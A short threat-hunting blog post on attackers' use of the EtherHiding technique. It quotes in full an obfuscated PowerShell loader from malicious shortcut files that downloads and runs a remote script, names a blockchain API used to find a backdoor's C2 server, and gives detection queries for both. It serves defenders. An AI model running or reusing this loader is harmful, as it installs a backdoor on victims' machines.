402. Adversaries Keep Actively Using the EtherHiding Technique

Hello everyone!

Threat actors continue to actively use the EtherHiding technique, and today we'll look at another example of it in action.

According to a report by LevelBlue, the attackers distributed malicious shortcut (.LNK) files. Interacting with these shortcuts resulted in the execution of an obfuscated PowerShell command, for example:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $Se4n4GmJ=[System.Numerics.BigInteger]\7330349723455890650683895074414054;$fobLzAK0=[System.Numerics.BigInteger]\5070886814366709789648062014091648;$YrXdQd=$Se4n4GmJ - $fobLzAK0;for($bwusN=100+156;$YrXdQd -ne 0;$YrXdQd=$YrXdQd / $bwusN){$JZwuEnBA+=[char]\([int]\($YrXdQd % $bwusN));};iwr $JZwuEnBA -OutFile $env\:TEMP\lFdlPb.ps1 -UseBasicParsing; powershell -ep bypass -File $env\:TEMP\lFdlPb.ps1

Notice that the obfuscation leverages the BigInteger type, which by itself provides an opportunity for hunting:

event_type: "processcreatewin"

AND

proc_file_path: "powershell.exe"

AND

cmdline: *bigint*

The downloaded script is designed to deploy a Node.js backdoor on the compromised system. One of its functions is to retrieve the command-and-control (C2) server address using the EtherHiding technique. In this case, it uses the TONAPI service, for example:

hxxps://tonapi[.]io/v2/blockchain/accounts/0:c66119f0e5635c4380441d7a79baf0c02a0ab7ea6cd78de06507fc5dc2c1a5d9/methods/get_domain

This presents yet another detection opportunity:

event_type: "dnsreqwin"

AND

dns_rname: "tonapi.io"

See you soon!

Comments

Popular posts from this blog

391. Hunting for TeamPCP's Stealer

343. Ransomware Gangs Abuse SystemSettingsAdminFlows to Evade Defenses

013. It Can Remove Rootkits. And Your EDR!